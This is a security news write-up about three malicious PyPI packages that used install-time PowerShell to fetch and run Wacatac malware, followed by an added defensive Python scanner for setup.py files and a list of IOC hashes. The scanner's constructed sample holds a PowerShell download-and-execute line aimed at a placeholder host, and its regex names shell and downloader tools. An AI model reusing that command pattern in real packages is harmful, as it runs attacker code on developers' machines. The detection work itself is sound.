April 26, 2024

Researchers have discovered three malicious packages on the PyPI repository, all uploaded by the same author, Lolip0p. The packages were identified on January 10, 2023: “colorslib” and “httpslib” had been published on January 7, 2023, and “libhttps” was published on January 12, 2023.

The packages were designed to drop malware on the systems of developers who installed them, and were downloaded over 550 times in total.

All three packages share an identical setup.py script that launches PowerShell at install time to download and run a malicious executable (“Oxzy.exe”) hosted on Dropbox. The download URL had not previously been labeled as malicious, while the downloaded executable was flagged as malicious by some security vendors.


When Oxzy.exe runs, it executes a second binary named update.exe from the temporary folder %USER%\AppData\Local\Temp.

The final payload dropped on the developers’ systems is the Wacatac malware, which can perform a broad range of malicious activities and deliver additional malicious payloads.

Python end users should always perform due diligence before downloading and running any packages, especially from new authors.
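As an added example (not code from the FortiGuard write-up or from the packages it describes), the following Python script performs the kind of pre-install due diligence described above: it statically inspects a package's setup.py for the pattern used by colorslib, httpslib and libhttps, namely install-time process execution, shell or PowerShell downloader keywords, and remote URLs outside the setup() metadata. The two sample setup.py texts are constructed for the example; the URL and file name in them are placeholders, not the real indicators.

```python
"""Pre-install triage of a Python package's setup.py (added example)."""
import ast
import re

# Functions that start another process when pip imports setup.py.
EXEC_CALLS = {
    "os.system", "os.popen", "os.execv", "os.execvp", "os.spawnl", "os.startfile",
    "subprocess.run", "subprocess.call", "subprocess.Popen",
    "subprocess.check_call", "subprocess.check_output",
}
DYNAMIC_CALLS = {"exec", "eval", "compile", "__import__"}
# Modules a plain packaging script has no business importing.
RISKY_MODULES = {"subprocess", "urllib", "requests", "socket", "ctypes", "base64"}
SHELL_TOKENS = re.compile(
    r"powershell|cmd\.exe|/bin/sh|\bbash\b|\bcurl\b|\bwget\b|Invoke-WebRequest|"
    r"DownloadFile|Start-Process|Invoke-Expression|\biex\b", re.I)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
SEVERITY = {"high": 3, "medium": 2, "low": 1}


def _dotted_name(node):
    """Return 'pkg.attr' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_setup_py(source):
    """Return (severity, line, message) findings for one setup.py source text."""
    try:
        tree = ast.parse(source)
    except SyntaxError as exc:
        # An install script that does not parse is itself a red flag (obfuscation).
        return [("high", exc.lineno or 0, f"setup.py does not parse: {exc.msg}")]

    # String literals passed as keyword arguments to setup() are metadata
    # (url=, download_url=, ...) and must not trip the URL heuristic.
    metadata_ids = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and _dotted_name(node.func) in ("setup", "setuptools.setup"):
            metadata_ids.update(id(kw.value) for kw in node.keywords)

    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in EXEC_CALLS:
                findings.append(("high", node.lineno, f"install-time process execution via {name}()"))
            elif name in DYNAMIC_CALLS:
                findings.append(("high", node.lineno, f"dynamic code execution via {name}()"))
        elif isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in RISKY_MODULES:
                    findings.append(("medium", node.lineno, f"imports {alias.name}"))
        elif isinstance(node, ast.ImportFrom) and node.module:
            if node.module.split(".")[0] in RISKY_MODULES:
                findings.append(("medium", node.lineno, f"imports from {node.module}"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str) and id(node) not in metadata_ids:
            if SHELL_TOKENS.search(node.value):
                findings.append(("medium", node.lineno, f"shell/downloader keyword in string {node.value[:50]!r}"))
            for url in URL_RE.findall(node.value):
                findings.append(("low", node.lineno, f"remote URL outside setup() metadata: {url}"))
    return findings


def verdict(findings):
    """Collapse a findings list to 'clean', 'low', 'medium' or 'high'."""
    if not findings:
        return "clean"
    return max((f[0] for f in findings), key=SEVERITY.__getitem__)


# Constructed sample: an install script that shells out to PowerShell to fetch
# and run a remote binary, the pattern described in the article. Placeholder URL.
SUSPICIOUS_SETUP_PY = '''
from setuptools import setup
import subprocess

subprocess.run(["powershell", "-Command",
    "Invoke-WebRequest https://example.invalid/placeholder.exe -OutFile $env:TEMP/p.exe; Start-Process $env:TEMP/p.exe"])

setup(name="colorslib", version="1.0.0", packages=[])
'''

# Constructed sample: an ordinary setup.py whose only URL is project metadata.
BENIGN_SETUP_PY = '''
from setuptools import setup, find_packages

setup(name="colorlib", version="1.0.0", packages=find_packages(),
      url="https://github.com/example/colorlib")
'''

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SETUP_PY), ("benign", BENIGN_SETUP_PY)):
        results = scan_setup_py(src)
        print(f"{label}: verdict={verdict(results)}")
        for sev, line, msg in results:
            print(f"  [{sev}] line {line}: {msg}")
```

To apply this to a real package without installing it, fetch the source distribution first with `pip download --no-deps --no-binary :all: <package>`, unpack the tarball and run scan_setup_py over its setup.py; only sdists execute setup.py at install time, so a package that ships only wheels is not exposed to this particular pattern. The exemption for setup() keyword values is what keeps an ordinary `url=` in project metadata from being reported, while the same URL in a subprocess argument still is.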

This research was documented by researchers from FortiGuard Labs.


Indicators of Compromise (file name and SHA-256 hash)

Oxzy.exe: 8dc8a9f5b5181911b0f4a051444c22e12d319878ea2a9eaaecab9686e876690b

update.exe: 293a3a2c8992636a5dba58ce088feb276ba39cf1b496b336eb7b6f65b1ddb757

SearchProtocolHost.exe: 123fd1c46a166c54ad66e66a10d53623af64c4b52b1827dfd8a96fdbf7675638
